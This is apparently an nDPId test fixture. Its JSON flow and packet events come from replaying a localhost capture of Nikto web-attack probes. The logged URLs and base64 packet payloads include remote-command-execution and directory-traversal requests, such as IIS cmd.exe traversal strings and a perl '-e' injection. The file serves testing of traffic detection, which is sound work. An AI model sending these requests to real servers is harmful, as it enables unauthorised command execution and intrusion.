{"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-local\/cgiemail-1.6\/cgicso?query=AAA","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000344)"}} 
+01079{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":523,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277515,"flow_last_seen":1576420277515,"flow_idle_time":7580000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277515,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50608,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-local\/cgiemail-1.6\/cgicso?query=AAA","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000344)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":524,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277516,"flow_last_seen":1576420277516,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277516,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50610,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":524,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_packet_id":1,"flow_last_seen":1576420277516,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420277516,"pkt":"AAAAAAAAAAAAAAAACABFAADO6rNAAEAGUXR\/AAABfwAAAcWyH5BduNJTZLl5JoAYAED+wgAAAQEICp1m\/jSdZv40R0VUIC9zZXJ2bGV0L1NjaGVkdWxlclRyYW5zZmVyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAzNDUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":524,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277516,"flow_last_seen":1576420277516,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277516,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50610,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlet\/SchedulerTransfer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000345)"}} 
+01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":524,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277516,"flow_last_seen":1576420277516,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277516,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50610,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlet\/SchedulerTransfer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000345)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":525,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277518,"flow_last_seen":1576420277518,"flow_idle_time":7580000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420277518,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50612,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00694{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_packet_id":1,"flow_last_seen":1576420277518,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":1576420277518,"pkt":"AAAAAAAAAAAAAAAACABFAADWgsZAAEAGuVl\/AAABfwAAAcW0H5A6eLoo9CriDoAYAED+ygAAAQEICp1m\/jWdZv41R0VUIC9zZXJ2bGV0L3N1bmV4YW1wbGVzLkJCb2FyZFNlcnZsZXQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDM0NikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":525,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277518,"flow_last_seen":1576420277518,"flow_idle_time":7580000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420277518,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50612,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlet\/sunexamples.BBoardServlet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000346)"}} 
+01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":525,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277518,"flow_last_seen":1576420277518,"flow_idle_time":7580000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420277518,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50612,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlet\/sunexamples.BBoardServlet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000346)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":526,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277519,"flow_last_seen":1576420277519,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277519,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50614,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":526,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_packet_id":1,"flow_last_seen":1576420277519,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420277519,"pkt":"AAAAAAAAAAAAAAAACABFAADPVxFAAEAG5RV\/AAABfwAAAcW2H5BSXG\/tRc4oyoAYAED+wwAAAQEICp1m\/jedZv43R0VUIC9zZXJ2bGV0cy9TY2hlZHVsZXJUcmFuc2ZlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDM0NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":526,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277519,"flow_last_seen":1576420277519,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277519,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50614,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlets\/SchedulerTransfer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000347)"}} 
+01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":526,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277519,"flow_last_seen":1576420277519,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277519,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50614,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlets\/SchedulerTransfer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000347)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":527,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277520,"flow_last_seen":1576420277520,"flow_idle_time":7580000,"flow_min_l4_payload_len":152,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":152,"midstream":1,"thread_ts_msec":1576420277520,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50616,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00682{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":527,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_packet_id":1,"flow_last_seen":1576420277520,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1576420277520,"pkt":"AAAAAAAAAAAAAAAACABFAADMFYpAAEAGJqB\/AAABfwAAAcW4H5AzUC1t6XmH4oAYAED+wAAAAQEICp1m\/jidZv44R0VUIC9wZXJsLy1lJTIwcHJpbnQlMjBIZWxsbyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMzUyKQ0KDQo="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277520,"flow_last_seen":1576420277520,"flow_idle_time":7580000,"flow_min_l4_payload_len":152,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":152,"midstream":1,"thread_ts_msec":1576420277520,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50616,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/perl\/-e%20print%20Hello","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000352)"}} 
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277520,"flow_last_seen":1576420277520,"flow_idle_time":7580000,"flow_min_l4_payload_len":152,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":152,"midstream":1,"thread_ts_msec":1576420277520,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50616,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/perl\/-e%20print%20Hello","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000352)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":528,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277522,"flow_last_seen":1576420277522,"flow_idle_time":7580000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277522,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50618,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_packet_id":1,"flow_last_seen":1576420277522,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"thread_ts_msec":1576420277522,"pkt":"AAAAAAAAAAAAAAAACABFAADYfsdAAEAGvVZ\/AAABfwAAAcW6H5DDSkYijR1boIAYAED+zAAAAQEICp1m\/jqdZv46R0VUIC9jL3dpbm50L3N5c3RlbTMyL2NtZC5leGU\/L2MrZGlyKy9PRyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDQ5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01078{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":528,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277522,"flow_last_seen":1576420277522,"flow_idle_time":7580000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277522,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50618,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/c\/winnt\/system32\/cmd.exe?\/c+dir+\/OG","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000491)"}} 
+01078{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":528,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277522,"flow_last_seen":1576420277522,"flow_idle_time":7580000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277522,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50618,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/c\/winnt\/system32\/cmd.exe?\/c+dir+\/OG","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000491)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":529,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277525,"flow_last_seen":1576420277525,"flow_idle_time":7580000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277525,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50620,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_packet_id":1,"flow_last_seen":1576420277525,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":266,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":266,"pkt_l4_len":232,"thread_ts_msec":1576420277525,"pkt":"AAAAAAAAAAAAAAAACABFAAD8VQBAAEAG5vl\/AAABfwAAAcW8H5BNImwcgJPNrYAYAED+8AAAAQEICp1m\/j2dZv48R0VUIC9tc2FkYy8uLiUyNTVjLi4vLi4lMjU1Yy4uLy4uJTI1NWMuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpcitjOiU1YyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwNDk0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":529,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277525,"flow_last_seen":1576420277525,"flow_idle_time":7580000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277525,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50620,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..\/..%255c..\/..%255c..\/winnt\/system32\/cmd.exe?\/c+dir+c:%5c","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000494)"}} 
+01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":529,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277525,"flow_last_seen":1576420277525,"flow_idle_time":7580000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277525,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50620,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..\/..%255c..\/..%255c..\/winnt\/system32\/cmd.exe?\/c+dir+c:%5c","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000494)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":530,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277526,"flow_last_seen":1576420277526,"flow_idle_time":7580000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277526,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50622,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_packet_id":1,"flow_last_seen":1576420277526,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":266,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":266,"pkt_l4_len":232,"thread_ts_msec":1576420277526,"pkt":"AAAAAAAAAAAAAAAACABFAAD8wPBAAEAGewl\/AAABfwAAAcW+H5C+lvgMjxfu9IAYAED+8AAAAQEICp1m\/j6dZv4+R0VUIC9tc2FkYy8uLiUyNTVjLi4vLi4lMjU1Yy4uLy4uJTI1NWMuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpcitjOiU1YyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDQ5NSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":530,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277526,"flow_last_seen":1576420277526,"flow_idle_time":7580000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277526,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50622,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..\/..%255c..\/..%255c..\/winnt\/system32\/cmd.exe?\/c+dir+c:%5c","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000495)"}} 
+01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":530,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277526,"flow_last_seen":1576420277526,"flow_idle_time":7580000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277526,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50622,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..\/..%255c..\/..%255c..\/winnt\/system32\/cmd.exe?\/c+dir+c:%5c","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000495)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":531,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277527,"flow_last_seen":1576420277527,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277527,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50624,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
